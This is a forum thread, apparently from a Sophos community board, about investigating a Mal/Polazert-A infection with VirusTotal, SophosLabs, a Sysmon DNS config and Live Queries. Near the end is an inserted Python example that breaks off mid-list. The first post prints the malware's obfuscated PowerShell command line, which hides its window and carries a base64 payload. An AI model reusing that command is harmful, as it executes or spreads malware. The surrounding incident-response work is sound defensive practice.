
Mal/Polazert-A Removal?

I have two endpoints at two totally unrelated clients where Sophos detected Mal/Polazert-A. Sophos is good at telling me about it, but it doesn't give me any options to remove it. Every time the client reboots their computer, they get a popup from Sophos after login that Sophos found this malware. Now I am concerned it is still running somehow and our client wants to know why we aren't removing malware from their computer.

I explain that Sophos detected and terminated it, but like me, they want to know why it is still there.

How do I remove it?

Details of the infection from Sophos Central:

Path:
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Name:
powershell.exe
Command line:
"PowerShell.exe" -EP byPAss -cOmMAnD "$a754ea6e8b041aa5b575492443c23=AdD-TypE -memBERDEfINITIon ('['+'d'.tOuppER()+'lL'.tolower()+'i'.Toupper()+'MpOrT('.toLOWeR()+[CHAr]0X22+'user32.DLl'.TOLoWer()+[CHar]0x22+')]PuBLIC sTATic extern BOol '.ToLOwEr()+'s'.tOupPEr()+'hOw'.ToLOWer()+'w'.TOupper()+'IndOw'.TOLoWeR()+'a'.TOupPEr()+'SYnc('.ToLower()+'i'.toUPper()+'nT'.tOLoweR()+'p'.tOUPper()+'Tr hwND, iNT NcmDSHow);'.toLOWER()) -naME ('W'.tOupPeR()+'iN32'.toLOweR()+'s'.TOUppEr()+'HoW'.TOLOwEr()+'w'.toUppeR()+'INDOW'.TOlOWeR()+'a'.tOUPPEr()+'SyNc'.TOlOWeR()) -nameSpacE WiN32FUNCTioNs -PAssThru;$a754ea6e8b041aa5b575492443c23::shoWWInDOWASYnc((gET-PROcess -id $Pid).mAiNWiNdOWHANdLE, 0);$a42b0d88df94e2b6b9453ae110cca='QHwmS1BAUnFIdEB3dChiQFZBPHJAVFEpel5uOzwzXk9+OGFeUTUrXkBSX0hGQHdKTXJeUjx6VEBWU0okQHFuJERAcW0pUUBSXyFvQHNfckxeTkYmTV5uJDZOQH04Tm9Ae1lIZV5NISlDXk07UiZeTyV5WkB7aFp4QHwmTmJeUnZDSUB1aVpLXlBHWl5AUzJCI15QckJiQH5NbyFAYHttJkB9aXVhXlBRZlVAUzQ0WEB0TTRuQHcxUFJeT3c3IV5ucm5pXlByVzhAeytXVEB2NWwwPCVeczB1I20wdGZ0I3g=';$a1bfc0
Process ID:
8456
Process executed by:
<domain>\Admin1
SHA256:
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
Start time:
Feb 9, 2022 7:51 PM
End time:
Feb 9, 2022 7:51 PM
Duration:
7s 69ms
Actions done to this artifact:
None
Actions performed by this artifact:
162 File reads
122 Registry value sets
19 File writes
9 File deletions
2 File renames
-Mike


  • I forgot to add, this one was easier to find since this PC does not have an NVIDIA video card. That entry looked wrong right as soon as I saw it.

    -Mike

  • This is great, glad you may have found a persistence entry.  That is certainly the idea.

    As for the MSI, I would start with uploading it to Virus Total:

    VirusTotal - Home

    If you can paste back the URL, I'd be interested to see the results of the vendors.

    Other than that, message back if you need any further assistance.  Not sure if you're able to provide the full command line argument in the PowerShell command.  I'd be happy to work out what it actually did/does.

  • One MSI: https://www.virustotal.com/gui/file/1ed9469724b3ba2891dc0efee29b1de93054601cb44aaf433c2b5860884dfa71

    This one was downloaded as 'Dental-Consent-Form-For-Poor-Prognosis.msi' for one client and as 'Adult-Social-Behavior-Questionnaire.msi' for the second client.

    I will work on the PowerShell command in a little bit. I really appreciate your contributions and assistance. Thank you again.

    -Mike

  • Well, that appears to be related to the .lnk file referenced, which you showed in Autoruns:

    ab3a7c450f6438b0df5a3a34d38c0.LNk

    In the VT analysis, on the relations page we see the same file:

    VirusTotal - File - 1ed9469724b3ba2891dc0efee29b1de93054601cb44aaf433c2b5860884dfa71

    So that matches up.

    I think it would be worth sending in the same file to SophosLabs and see what they say.

    FileSubmission (sophos.com)

  • I still haven't run that PowerShell command. I am finding that task a little challenging, but I will keep trying.

    I submitted the file to Sophos, who provided the following analysis:

    As per the SophosLabs team, both zips contain the same sample.

    _p5_1 => identity associated (New detection: Troj/PS-JV)

    Decoded.bin => detected as Mal/Polazert-A

    The endpoints for this client have not detected any further malicious activity, but the ATP log on the firewall continues to receive these alerts which generate emails that I investigate:

    We have DNS on the firewall set to Google, which is why we see 8.8.8.8 and 8.8.4.4. Although I am unclear why we aren't seeing that come from the actual attacker.

    The 192.168.25.6 address is the domain controller for our client. I have scanned this server multiple times with Sophos, Kaspersky, and SentinelOne. No malware found. Nothing suspicious in Autoruns either.

    Am I right to assume this is a malicious website trying to contact an endpoint inside the client network and ATP is doing its job by blocking and dropping the traffic as I instructed it to? If so, I suppose there is nothing else I can do at this point besides wait and hope they stop trying?

    -Mike

  • Hi Mike, sorry for the delay.

    I see that after hitting re-analyze for that hash (1ed9469724b3ba2891dc0efee29b1de93054601cb44aaf433c2b5860884dfa71) on VirusTotal, we now have: VirusTotal - Analysing file

    Sophos - Troj/Deimos-R

    There are still quite a few other vendors that don't detect it, e.g. BitDefender, F-Secure, McAfee, to name a few.

    I'm not sure about the DNS request/response seemingly ending up in a C2 detection.

    I can understand a malicious process on a client making a request to fdfdfdf.info, for example; this would likely result in a DNS query to the local DNS server, in this case 192.168.25.6. This isn't going to be authoritative, so it will forward the query on to a specified forwarder, which I could imagine being Google's DNS. The results would come back into the local DNS server from Google and trigger the incoming alert on the XG.

    So it does seem to suggest there is a host on the inside at least going through the resolution steps prior to making the connection of that .info domain.

    I think I would start by trying to understand the client or clients looking up that domain and ideally get back to a process. Can you do that from the XG logs? I suspect so, but I don't know the XG that well. Maybe it would be worth posting in the XG forum.

    I am aware of ways at the endpoint, such as those described here, to log the processes making the connection:

    Steps to enable DNS Query Logging on Windows systems (windowsreport.com)

    You can enable Sysmon on the endpoints as mentioned above, and you can then use Sophos Central to centrally query the Sysmon event logs. For example, for Event ID 1 (Process creation) the following LiveQuery would work:

    SELECT
    --strftime('%Y-%m-%dT%H:%M:%SZ',datetime) AS Datetime,
    JSON_EXTRACT(data, '$.EventData.UtcTime') as UtcTime,
    JSON_EXTRACT(data, '$.EventData.ProcessId') as ProcessId,
    JSON_EXTRACT(data, '$.EventData.CommandLine') as CommandLine,
    JSON_EXTRACT(data, '$.EventData.User') as User,
    JSON_EXTRACT(data, '$.EventData.ParentProcessId') as ParentProcessId,
    JSON_EXTRACT(data, '$.EventData.ParentCommandLine') as ParentCommandLine,
    JSON_EXTRACT(data, '$.EventData.Image') as Image,
    JSON_EXTRACT(data, '$.EventData.FileVersion') as FileVersion,
    JSON_EXTRACT(data, '$.EventData.Description') as Description,
    JSON_EXTRACT(data, '$.EventData.Product') as Product,
    JSON_EXTRACT(data, '$.EventData.Company') as Company,
    JSON_EXTRACT(data, '$.EventData.OriginalFileName') as OriginalFileName,
    JSON_EXTRACT(data, '$.EventData.ProcessGuid') as ProcessGuid,
    JSON_EXTRACT(data, '$.EventData.CurrentDirectory') as CurrentDirectory,
    JSON_EXTRACT(data, '$.EventData.LogonGuid') as LogonGuid,
    JSON_EXTRACT(data, '$.EventData.LogonId') as LogonId,
    JSON_EXTRACT(data, '$.EventData.TerminalSessionId') as TerminalSessionId,
    JSON_EXTRACT(data, '$.EventData.IntegrityLevel') as IntegrityLevel,
    JSON_EXTRACT(data, '$.EventData.Hashes') as Hashes,
    JSON_EXTRACT(data, '$.EventData.ParentProcessGuid') as ParentProcessGuid,
    JSON_EXTRACT(data, '$.EventData.ParentImage') as ParentImage
    FROM
    sophos_windows_events where source = 'Microsoft-Windows-Sysmon/Operational'
    and eventid = 1


    The same idea could be used to search for domain lookups I suppose.

  • Just tested it by downloading Sysmon from:

    Sysmon - Windows Sysinternals | Microsoft Docs

    I put sysmon.exe in C:\tools\ and ran it from an admin prompt:

    sysmon.exe -c .\sysmon-dns.xml

    sysmon-dns.xml is a file I created based on sysmon-config/sysmonconfig-export.xml at master · SwiftOnSecurity/sysmon-config · GitHub, but just targeting the DNS section. So it's down to:

    <Sysmon schemaversion="4.50">
    	<HashAlgorithms>md5,sha256,IMPHASH</HashAlgorithms>
    	<EventFiltering>
    		<DnsQuery onmatch="exclude">
    			<!--Network noise-->
    			<QueryName condition="end with">.arpa.</QueryName> <!--Design decision to not log reverse DNS lookups. You will need to decide.-->
    			<QueryName condition="end with">.arpa</QueryName> <!--Design decision to not log reverse DNS lookups. You will need to decide.-->
    			<QueryName condition="end with">.msftncsi.com</QueryName> <!--Microsoft proxy detection | Microsoft default exclusion-->
    			<QueryName condition="is">..localmachine</QueryName>
    			<QueryName condition="is">localhost</QueryName>
    			<!--Microsoft-->
    			<QueryName condition="end with">-pushp.svc.ms</QueryName> <!--Microsoft: Doesn't appear to host customer content or subdomains-->
    			<QueryName condition="end with">.b-msedge.net</QueryName> <!--Microsoft: Doesn't appear to host customer content or subdomains-->
    			<QueryName condition="end with">.bing.com</QueryName> <!-- Microsoft | Microsoft default exclusion -->
    			<QueryName condition="end with">.hotmail.com</QueryName> <!--Microsoft | Microsoft default exclusion-->
    			<QueryName condition="end with">.live.com</QueryName> <!--Microsoft | Microsoft default exclusion-->
    			<QueryName condition="end with">.live.net</QueryName> <!--Microsoft | Microsoft default exclusion-->
    			<QueryName condition="end with">.s-microsoft.com</QueryName> <!--Microsoft-->
    			<QueryName condition="end with">.microsoft.com</QueryName> <!--Microsoft | Microsoft default exclusion-->
    			<QueryName condition="end with">.microsoftonline.com</QueryName> <!--Microsoft | Microsoft default exclusion-->
    			<QueryName condition="end with">.microsoftstore.com</QueryName> <!--Microsoft | Microsoft default exclusion-->
    			<QueryName condition="end with">.ms-acdc.office.com</QueryName> <!--Microsoft: Doesn't appear to host customer content or subdomains-->
    			<QueryName condition="end with">.msedge.net</QueryName> <!--Microsoft: Doesn't appear to host customer content or subdomains-->
    			<QueryName condition="end with">.msn.com</QueryName> <!--Microsoft | Microsoft default exclusion-->
    			<QueryName condition="end with">.msocdn.com</QueryName> <!--Microsoft-->
    			<QueryName condition="end with">.skype.com</QueryName> <!--Microsoft | Microsoft default exclusion-->
    			<QueryName condition="end with">.skype.net</QueryName> <!--Microsoft | Microsoft default exclusion-->
    			<QueryName condition="end with">.windows.com</QueryName> <!--Microsoft-->
    			<QueryName condition="end with">.windows.net.nsatc.net</QueryName> <!--Microsoft-->
    			<QueryName condition="end with">.windowsupdate.com</QueryName> <!--Microsoft-->
    			<QueryName condition="end with">.xboxlive.com</QueryName> <!--Microsoft-->
    			<QueryName condition="is">login.windows.net</QueryName> <!--Microsoft-->
    			<Image condition="begin with">C:\ProgramData\Microsoft\Windows Defender\Platform\</Image> <!--Microsoft: https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/network-protection -->
    			<!--Microsoft:Office365/AzureAD-->
    			<QueryName condition="end with">.activedirectory.windowsazure.com</QueryName> <!--Microsoft: AzureAD-->
    			<QueryName condition="end with">.aria.microsoft.com</QueryName> <!--Microsoft: OneDrive/SharePoint-->
    			<QueryName condition="end with">.msauth.net</QueryName>
    			<QueryName condition="end with">.msftauth.net</QueryName>
    			<QueryName condition="end with">.office.net</QueryName> <!--Microsoft: Office-->
    			<QueryName condition="end with">.opinsights.azure.com</QueryName> <!--Microsoft: AzureAD/InTune client event monitoring-->
    			<QueryName condition="end with">.res.office365.com</QueryName> <!--Microsoft: Office-->
    			<QueryName condition="is">acdc-direct.office.com</QueryName> <!--Microsoft: Office-->
    			<QueryName condition="is">atm-fp-direct.office.com</QueryName> <!--Microsoft: Office-->
    			<QueryName condition="is">loki.delve.office.com</QueryName> <!--Microsoft: Office-->
    			<QueryName condition="is">management.azure.com</QueryName> <!--Microsoft: AzureAD/InTune-->
    			<QueryName condition="is">messaging.office.com</QueryName> <!--Microsoft: Office-->
    			<QueryName condition="is">outlook.office365.com</QueryName> <!--Microsoft: Protected by HSTS-->
    			<QueryName condition="is">portal.azure.com</QueryName> <!--Microsoft: AzureAD/InTune-->
    			<QueryName condition="is">protection.outlook.com</QueryName> <!--Microsoft: Office-->
    			<QueryName condition="is">substrate.office.com</QueryName> <!--Microsoft: Office-->
    			<QueryName condition="end with">.measure.office.com</QueryName> <!--Microsoft: Office-->
    			<!--3rd-party applications-->
    			<QueryName condition="end with">.adobe.com</QueryName> <!--Adobe-->
    			<QueryName condition="end with">.adobe.io</QueryName> <!--Adobe-->
    			<QueryName condition="end with">.mozaws.net</QueryName> <!--Mozilla-->
    			<QueryName condition="end with">.mozilla.com</QueryName> <!--Mozilla-->
    			<QueryName condition="end with">.mozilla.net</QueryName> <!--Mozilla-->
    			<QueryName condition="end with">.mozilla.org</QueryName> <!--Mozilla-->
    			<QueryName condition="end with">.spotify.com</QueryName> <!--Spotify-->
    			<QueryName condition="end with">.spotify.map.fastly.net</QueryName> <!--Spotify-->
    			<QueryName condition="end with">.wbx2.com</QueryName> <!--Webex-->
    			<QueryName condition="end with">.webex.com</QueryName> <!--Webex-->
    			<QueryName condition="is">clients1.google.com</QueryName> <!--Google-->
    			<QueryName condition="is">clients2.google.com</QueryName> <!--Google-->
    			<QueryName condition="is">clients3.google.com</QueryName> <!--Google-->
    			<QueryName condition="is">clients4.google.com</QueryName> <!--Google-->
    			<QueryName condition="is">clients5.google.com</QueryName> <!--Google-->
    			<QueryName condition="is">clients6.google.com</QueryName> <!--Google-->
    			<QueryName condition="is">safebrowsing.googleapis.com</QueryName> <!--Google-->
    			<!--Goodlist CDN-->
    			<QueryName condition="end with">.akadns.net</QueryName> <!--AkamaiCDN, extensively used by Microsoft | Microsoft default exclusion-->
    			<QueryName condition="end with">.netflix.com</QueryName>
    			<QueryName condition="end with">aspnetcdn.com</QueryName> <!--Microsoft [ https://docs.microsoft.com/en-us/aspnet/ajax/cdn/overview ]-->
    			<QueryName condition="is">ajax.googleapis.com</QueryName>
    			<QueryName condition="is">cdnjs.cloudflare.com</QueryName> <!--Cloudflare: Hosts popular javascript libraries-->
    			<QueryName condition="is">fonts.googleapis.com</QueryName> <!--Google fonts-->
    			<QueryName condition="end with">.typekit.net</QueryName> <!--Adobe fonts-->
    			<QueryName condition="end with">.stackassets.com</QueryName> <!--Stack Overflow-->
    			<QueryName condition="end with">.steamcontent.com</QueryName>
    			<QueryName condition="is">play.google.com</QueryName>
    			<QueryName condition="is">content-autofill.googleapis.com</QueryName>
    			<!--Web resources-->
    			<QueryName condition="end with">.disqus.com</QueryName> <!--Microsoft default exclusion-->
    			<QueryName condition="end with">.fontawesome.com</QueryName>
    			<QueryName condition="is">disqus.com</QueryName> <!--Microsoft default exclusion-->
    			<!--Ads-->
    			<QueryName condition="end with">.1rx.io</QueryName> <!--Ads-->
    			<QueryName condition="end with">.2mdn.net</QueryName> <!--Ads: Google | Microsoft default exclusion-->
    			<QueryName condition="end with">.3lift.com</QueryName> <!--Ads-->
    			<QueryName condition="end with">.adadvisor.net</QueryName> <!--Ads: Neustar [ https://better.fyi/trackers/adadvisor.net/ ] -->
    			<QueryName condition="end with">.adap.tv</QueryName> <!--Ads:AOL | Microsoft default exclusion [ https://www.crunchbase.com/organization/adap-tv ] -->
    			<QueryName condition="end with">.addthis.com</QueryName> <!--Ads:Oracle | Microsoft default exclusion [ https://en.wikipedia.org/wiki/AddThis ] -->
    			<QueryName condition="end with">.adform.net</QueryName> <!--Ads-->
    			<QueryName condition="end with">.adnxs.com</QueryName> <!--Ads: AppNexus | Microsoft default exclusion-->
    			<QueryName condition="end with">.adroll.com</QueryName> <!--Ads-->
    			<QueryName condition="end with">.adrta.com</QueryName> <!--Ads-->
    			<QueryName condition="end with">.adsafeprotected.com</QueryName> <!--Ads-->
    			<QueryName condition="end with">.adsrvr.org</QueryName> <!--Ads-->
    			<QueryName condition="end with">.adsymptotic.com</QueryName> <!--Ads-->
    			<QueryName condition="end with">.advertising.com</QueryName> <!--Ads | Microsoft default exclusion-->
    			<QueryName condition="end with">.agkn.com</QueryName> <!--Ads | [ https://www.home.neustar/privacy ] -->
    			<QueryName condition="end with">.amazon-adsystem.com</QueryName> <!--Ads-->
    			<QueryName condition="end with">.analytics.yahoo.com</QueryName> <!--Ads:Yahoo-->
    			<QueryName condition="end with">.aol.com</QueryName> <!--Ads | Microsoft default exclusion -->
    			<QueryName condition="end with">.betrad.com</QueryName> <!--Ads | Microsoft default exclusion-->
    			<QueryName condition="end with">.bidswitch.net</QueryName> <!--Ads-->
    			<QueryName condition="end with">.casalemedia.com</QueryName> <!--Ads | Microsoft default exclusion-->
    			<QueryName condition="end with">.chartbeat.net</QueryName> <!--Ads | Microsoft default exclusion [ https://better.fyi/trackers/chartbeat.com/ ]-->
    			<QueryName condition="end with">.cnn.com</QueryName> <!-- Microsoft default exclusion-->
    			<QueryName condition="end with">.convertro.com</QueryName> <!--Ads:Verizon-->
    			<QueryName condition="end with">.criteo.com</QueryName> <!--Ads [ https://better.fyi/trackers/criteo.com/ ] -->
    			<QueryName condition="end with">.criteo.net</QueryName> <!--Ads [ https://better.fyi/trackers/criteo.com/ ] -->
    			<QueryName condition="end with">.crwdcntrl.net</QueryName> <!--Ads: Lotame [ https://better.fyi/trackers/crwdcntrl.net/ ] -->
    			<QueryName condition="end with">.demdex.net</QueryName> <!--Ads | Microsoft default exclusion-->
    			<QueryName condition="end with">.domdex.com</QueryName>
    			<QueryName condition="end with">.dotomi.com</QueryName> <!--Ads | Microsoft default exclusion-->
    			<QueryName condition="end with">.doubleclick.net</QueryName> <!--Ads:Conversant | Microsoft default exclusion [ https://www.crunchbase.com/organization/dotomi ] -->
    			<QueryName condition="end with">.doubleverify.com</QueryName> <!--Ads: Google-->
    			<QueryName condition="end with">.emxdgt.com</QueryName> <!--Ads: EMX-->
    			<QueryName condition="end with">.everesttech.net</QueryName> <!--Ads | [ https://better.fyi/trackers/everesttech.net/ ] -->
    			<QueryName condition="end with">.exelator.com</QueryName> <!--Ads:Nielsen Marketing Cloud-->
    			<QueryName condition="end with">.google-analytics.com</QueryName> <!--Ads:Google | Microsoft default exclusion-->
    			<QueryName condition="end with">.googleadservices.com</QueryName> <!--Google-->
    			<QueryName condition="end with">.googlesyndication.com</QueryName> <!--Ads:Google, sometimes called during malicious ads, but not directly responsible | Microsoft default exclusion [ https://www.hackread.com/wp-content/uploads/2018/06/Bitdefender-Whitepaper-Zacinlo.pdf ]-->
    			<QueryName condition="end with">.googletagmanager.com</QueryName> <!--Google-->
    			<QueryName condition="end with">.googlevideo.com</QueryName> <!--Google | Microsoft default exclusion-->
    			<QueryName condition="end with">.gstatic.com</QueryName> <!--Google | Microsoft default exclusion-->
    			<QueryName condition="end with">.gvt1.com</QueryName> <!--Google-->
    			<QueryName condition="end with">.gvt2.com</QueryName> <!--Google-->
    			<QueryName condition="end with">.ib-ibi.com</QueryName> <!--Ads: Offerpath [ https://better.fyi/trackers/ib-ibi.com/ ] -->
    			<QueryName condition="end with">.jivox.com</QueryName> <!--Ads-->
    			<QueryName condition="end with">.krxd.net</QueryName> <!--Ads-->
    			<QueryName condition="end with">.lijit.com</QueryName> <!--Ads-->
    			<QueryName condition="end with">.mathtag.com</QueryName> <!--Microsoft default exclusion-->
    			<QueryName condition="end with">.moatads.com</QueryName> <!--Ads | Microsoft default exclusion-->
    			<QueryName condition="end with">.moatpixel.com</QueryName> <!--Ads | Microsoft default exclusion-->
    			<QueryName condition="end with">.mookie1.com</QueryName> <!--Ads-->
    			<QueryName condition="end with">.myvisualiq.net</QueryName> <!--Ads-->
    			<QueryName condition="end with">.netmng.com</QueryName> <!--Ads-->
    			<QueryName condition="end with">.nexac.com</QueryName> <!--Ads | Microsoft default exclusion-->
    			<QueryName condition="end with">.openx.net</QueryName> <!--Ads-->
    			<QueryName condition="end with">.optimizely.com</QueryName> <!--Ads-->
    			<QueryName condition="end with">.outbrain.com</QueryName> <!--Ads-->
    			<QueryName condition="end with">.pardot.com</QueryName> <!--Ads-->
    			<QueryName condition="end with">.phx.gbl</QueryName> <!--Ads | Microsoft default exclusion-->
    			<QueryName condition="end with">.pinterest.com</QueryName> <!--Pinterest-->
    			<QueryName condition="end with">.pubmatic.com</QueryName> <!--Ads | Microsoft default exclusion-->
    			<QueryName condition="end with">.quantcount.com</QueryName>
    			<QueryName condition="end with">.quantserve.com</QueryName>
    			<QueryName condition="end with">.revsci.net</QueryName> <!--Ads:Omniture | Microsoft default exclusion-->
    			<QueryName condition="end with">.rfihub.net</QueryName> <!--Ads | Microsoft default exclusion-->
    			<QueryName condition="end with">.rlcdn.com</QueryName> <!--Ads: Rapleaf [ https://better.fyi/trackers/rlcdn.com/ ] -->
    			<QueryName condition="end with">.rubiconproject.com</QueryName> <!--Ads: Rubicon Project | Microsoft default exclusion [ https://better.fyi/trackers/rubiconproject.com/ ] -->
    			<QueryName condition="end with">.scdn.co</QueryName> <!--Spotify-->
    			<QueryName condition="end with">.scorecardresearch.com</QueryName> <!--Ads: Comscore | Microsoft default exclusion-->
    			<QueryName condition="end with">.serving-sys.com</QueryName> <!--Ads | Microsoft default exclusion-->
    			<QueryName condition="end with">.sharethrough.com</QueryName> <!--Ads-->
    			<QueryName condition="end with">.simpli.fi</QueryName>
    			<QueryName condition="end with">.sitescout.com</QueryName> <!--Ads-->
    			<QueryName condition="end with">.smartadserver.com</QueryName> <!--Ads-->
    			<QueryName condition="end with">.snapads.com</QueryName> <!--Ads-->
    			<QueryName condition="end with">.spotxchange.com</QueryName> <!--Ads-->
    			<QueryName condition="end with">.taboola.com</QueryName> <!--Ads:Taboola-->
    			<QueryName condition="end with">.taboola.map.fastly.net</QueryName> <!--Ads:Taboola-->
    			<QueryName condition="end with">.tapad.com</QueryName>
    			<QueryName condition="end with">.tidaltv.com</QueryName> <!--Ads: Videology [ https://better.fyi/trackers/tidaltv.com/ ] -->
    			<QueryName condition="end with">.trafficmanager.net</QueryName> <!--Ads | Microsoft default exclusion-->
    			<QueryName condition="end with">.tremorhub.com</QueryName> <!--Ads-->
    			<QueryName condition="end with">.tribalfusion.com</QueryName> <!--Ads: Exponential [ https://better.fyi/trackers/tribalfusion.com/ ] -->
    			<QueryName condition="end with">.turn.com</QueryName> <!--Ads | Microsoft default exclusion [ https://better.fyi/trackers/turn.com/ ] -->
    			<QueryName condition="end with">.twimg.com</QueryName> <!--Ads | Microsoft default exclusion-->
    			<QueryName condition="end with">.tynt.com</QueryName> <!--Ads-->
    			<QueryName condition="end with">.w55c.net</QueryName> <!--Ads:dataxu-->
    			<QueryName condition="end with">.ytimg.com</QueryName> <!--Google-->
    			<QueryName condition="end with">.zorosrv.com</QueryName> <!--Ads:Taboola-->
    			<QueryName condition="is">1rx.io</QueryName> <!--Ads-->
    			<QueryName condition="is">adservice.google.com</QueryName> <!--Google-->
    			<QueryName condition="is">ampcid.google.com</QueryName> <!--Google-->
    			<QueryName condition="is">clientservices.googleapis.com</QueryName> <!--Google-->
    			<QueryName condition="is">googleadapis.l.google.com</QueryName> <!--Google-->
    			<QueryName condition="is">imasdk.googleapis.com</QueryName> <!--Google [ https://developers.google.com/interactive-media-ads/docs/sdks/html5/ ] -->
    			<QueryName condition="is">l.google.com</QueryName> <!--Google-->
    			<QueryName condition="is">ml314.com</QueryName> <!--Ads-->
    			<QueryName condition="is">mtalk.google.com</QueryName> <!--Google-->
    			<QueryName condition="is">update.googleapis.com</QueryName> <!--Google-->
    			<QueryName condition="is">www.googletagservices.com</QueryName> <!--Google-->
    			<!--SocialNet-->
    			<QueryName condition="end with">.pscp.tv</QueryName> <!--Twitter:Periscope-->
    			<!--OCSP/CRL Common-->
    			<QueryName condition="end with">.amazontrust.com</QueryName>
    			<QueryName condition="end with">.digicert.com</QueryName>
    			<QueryName condition="end with">.globalsign.com</QueryName>
    			<QueryName condition="end with">.globalsign.net</QueryName>
    			<QueryName condition="end with">.intel.com</QueryName>
    			<QueryName condition="end with">.symcb.com</QueryName> <!--Digicert-->
    			<QueryName condition="end with">.symcd.com</QueryName> <!--Digicert-->
    			<QueryName condition="end with">.thawte.com</QueryName>
    			<QueryName condition="end with">.usertrust.com</QueryName>
    			<QueryName condition="end with">.verisign.com</QueryName>
    			<QueryName condition="end with">ocsp.identrust.com</QueryName>
    			<QueryName condition="end with">pki.goog</QueryName>
    			<QueryName condition="is">msocsp.com</QueryName> <!--Microsoft:OCSP-->
    			<QueryName condition="is">ocsp.comodoca.com</QueryName>
    			<QueryName condition="is">ocsp.entrust.net</QueryName>
    			<QueryName condition="is">ocsp.godaddy.com</QueryName>
    			<QueryName condition="is">ocsp.int-x3.letsencrypt.org</QueryName>
    			<QueryName condition="is">ocsp.msocsp.com</QueryName> <!--Microsoft:OCSP-->
    			<QueryName condition="end with">amazontrust.com</QueryName>
    			<QueryName condition="is">ocsp.sectigo.com</QueryName>
    			<QueryName condition="is">pki-goog.l.google.com</QueryName>
    			<QueryName condition="is">ocsp.verisign.com</QueryName>
    			<QueryName condition="is">status.rapidssl.com</QueryName>
    			<QueryName condition="is">status.thawte.com</QueryName>
    		</DnsQuery>
    	</EventFiltering>
    </Sysmon>

    I waited for the computer to generate some data for this in the Sysmon event log, then in Sophos Central created a new Live Query with the following:

    SELECT
    --strftime('%Y-%m-%dT%H:%M:%SZ',datetime) AS Datetime,
    JSON_EXTRACT(data, '$.EventData.UtcTime') as UtcTime,
    JSON_EXTRACT(data, '$.EventData.ProcessId') as ProcessId,
    JSON_EXTRACT(data, '$.EventData.QueryName') as QueryName,
    JSON_EXTRACT(data, '$.EventData.QueryStatus') as QueryStatus,
    JSON_EXTRACT(data, '$.EventData.QueryResults') as QueryResults,
    JSON_EXTRACT(data, '$.EventData.Image') as Image,
    JSON_EXTRACT(data, '$.EventData.User') as User
    FROM
    sophos_windows_events where source = 'Microsoft-Windows-Sysmon/Operational'
    and eventid = 22

    This created a report of the data.

    So for a given address, you could either filter for it in the Sysmon config or filter for it in the LiveQuery query.

    E.g., adding a clause to filter for processes that have made a DNS request for "adservice.google.com" shows MsEdge.exe performed 2 queries for this domain.

  • I haven't been able to get Sysmon installed and configured for this office's endpoints, but I did notice there is a DNS Client log built into Windows by default now, Microsoft-Windows-DNS-Client/Operational.

    I tried enabling that on some PCs and running a variation of the query above, but it always shows me no results. Intercept X and Kaspersky show no infections on any PC in the office.

    They have two WiFi SSIDs running, both from the APX320 and the XG115. Guest is set up as 'Separate Zone' and Private is set up as 'Bridge to AP LAN'.

    DNS on the XG115 is set to Google. Could it be that perhaps someone on the WiFi has an infected device that is creating this traffic? The traffic is still the same as it was in my screenshot a couple of weeks ago. It's not every day, just during the week, during business hours. All office PCs stay on and connected to the internet.

    -Mike

  • The following Live Query, having enabled the built-in operational event log "Microsoft-Windows-DNS-Client/Operational", works OK.

    In this example I have created a string variable called domain, to make editing the domain "external" to the query:

    SELECT
    datetime,
    JSON_EXTRACT(data, '$.EventData.QueryName') as QueryName,
    JSON_EXTRACT(data, '$.EventData.QueryType') as QueryType,
    JSON_EXTRACT(data, '$.EventData.DnsServerIpAddress') as DnsServerIpAddress,
    JSON_EXTRACT(data, '$.EventData.ClientPID') as ClientPID
    FROM
    sophos_windows_events where source = 'Microsoft-Windows-DNS-Client/Operational'
    and eventid = 3010
    and QueryName like '$$domain$$'

    This does give a PID, but the benefit of Sysmon is that it also provides the process. That said, this may suffice if you're initially just interested in the domain.

    I suspect if an application used sockets to construct its own DNS query rather than using a DNS API, then the Windows DNS resolver wouldn't see it.

    It might be worth you creating a new post in the XG part of the forum. The people there might be better placed to respond on how to approach such alerts.

    Thanks.
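    The correlation the Sysmon (Event ID 22) and DNS-Client (3010) Live Queries above perform, as an added offline Python example that is not code from this thread or from Sophos: it counts Sysmon DNS queries for a domain per process image, and for 3010 events, which only carry a ClientPID, joins that PID back to the most recent Sysmon Event ID 1 record to recover the image, the gap noted in this post. The rows, image paths, PIDs and times are constructed to mimic the sophos_windows_events columns the queries use, and matching covers a domain and its subdomains rather than an exact like pattern.

```python
"""
Offline correlation of the DNS telemetry discussed in this thread.

Rows mimic the sophos_windows_events table used by the Live Queries:
`source`, `eventid`, `datetime`, and a `data` column holding the event
as JSON with an "EventData" object. All rows below are constructed.
"""
import json
from collections import Counter
from datetime import datetime

SYSMON = "Microsoft-Windows-Sysmon/Operational"
DNSCLIENT = "Microsoft-Windows-DNS-Client/Operational"

# Constructed image paths for the sample processes.
EDGE = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


def _row(source, eventid, when, **event_data):
    """Build one constructed sophos_windows_events-style row (times are UTC)."""
    return {"source": source, "eventid": eventid, "datetime": when,
            "data": json.dumps({"EventData": event_data})}


SAMPLE_ROWS = [
    # Sysmon Event ID 1 (process creation) and Event ID 22 (DNS query).
    _row(SYSMON, 1, "2022-02-09T09:00:00", ProcessId="4120", Image=EDGE, User="CORP\\user1"),
    _row(SYSMON, 22, "2022-02-09T09:10:01", ProcessId="4120", Image=EDGE,
         QueryName="adservice.google.com", QueryStatus="0"),
    _row(SYSMON, 22, "2022-02-09T09:12:30", ProcessId="4120", Image=EDGE,
         QueryName="adservice.google.com", QueryStatus="0"),
    _row(SYSMON, 22, "2022-02-09T09:13:00", ProcessId="4120", Image=EDGE,
         QueryName="www.bing.com", QueryStatus="0"),
    # DNS-Client 3010 carries only the PID of the querying process.
    _row(DNSCLIENT, 3010, "2022-02-09T09:10:01", QueryName="adservice.google.com",
         QueryType="1", DnsServerIpAddress="192.168.25.6", ClientPID="4120"),
    # PID 4120 is reused by a later process, so the join must respect time.
    _row(SYSMON, 1, "2022-02-09T09:30:00", ProcessId="4120", Image=PS, User="CORP\\user1"),
    _row(DNSCLIENT, 3010, "2022-02-09T09:40:00", QueryName="adservice.google.com",
         QueryType="1", DnsServerIpAddress="192.168.25.6", ClientPID="4120"),
    # No Sysmon process-creation record exists for this PID at all.
    _row(DNSCLIENT, 3010, "2022-02-09T09:05:00", QueryName="adservice.google.com",
         QueryType="1", DnsServerIpAddress="192.168.25.6", ClientPID="999"),
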